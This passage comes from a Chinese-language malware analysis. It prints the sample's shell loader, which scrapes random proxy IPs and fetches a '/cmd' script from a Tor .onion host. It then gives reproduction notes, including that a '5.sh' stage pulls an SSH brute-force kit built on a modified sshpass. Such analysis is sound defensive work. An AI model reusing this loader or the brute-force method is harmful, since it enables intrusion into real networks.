s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
u() {
sockz
f=/cmd
$c -x socks5h://$s:9050 $t.onion$f || $c $1$f
}
(
u $t.tor
功能:下载/cmd脚本文件(文件链接已失效)
三、 复现中注意问题
- 通过tor代理下载模块、脚本、tor包时会出现不稳定的情况,如果多次下载失败,可以换一个代理IP节点下载,多尝试几次。
- 5.sh中拉取的内网爆破工具包中包含一个sshpass改过的工具,用于内网暴力破解,该工具可能存在一些爆破成功后的后置动作,需进一步分析。
